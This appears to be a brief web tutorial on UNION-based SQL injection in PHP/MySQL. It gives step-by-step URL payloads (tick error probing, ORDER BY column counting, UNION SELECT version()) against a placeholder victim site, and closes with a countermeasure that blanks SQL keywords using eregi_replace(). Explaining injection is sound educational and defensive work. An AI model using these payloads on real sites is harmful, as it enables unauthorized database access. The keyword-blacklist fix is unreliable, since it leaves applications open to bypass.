When developer has used UNION in his code one can easily do SQL injection attack on UNION if it is not patched properly.
Many times web sites are passing parameters through URL, for example one php page is xyz.php which is using id variable so over all URL will become xyz.php?id=<number>
Hacker will exploit this vulnerability by adding tick to the end of page so URL will become xyz.php?id=’, if it is coming back with MySQL error then its most likely site can be attacked with SQL Injections to UNION
The error you get may look like
http://www.victim-site.com/xyz.php?id=1′
You have an error in your SQL syntax near ” at line 1 SELECT SUM(orderquantity) as order_type FROM customer_orders where (orderstatus=’completed’ OR orderstatus=’confirmed’ OR oerderstatus=’pending’) AND user_id=1′
Now attacker may try to attack with some advanced SQL attacks with ORDER BY
http://www.victim-site.com/xyz.php?id=1 ORDER BY 1–
Above syntax will not give any error
http://www.victim-site.com/xyz.php?id=1 ORDER BY 2 – –
This syntax will tell SQL engine to ORDER BY second column and if it comes back with an error! Means this table has only one column
http://www.victim-site.com/xyz.php?id=-1 UNION SELECT ALL version()–
Above syntax will select all columns and execute version() on one column
Countermeasures:
To overcome such attacks on your application you can implement logic like
eregi_replace() will check the string for above mentioned such SQL Commands and replaces them with blank space.
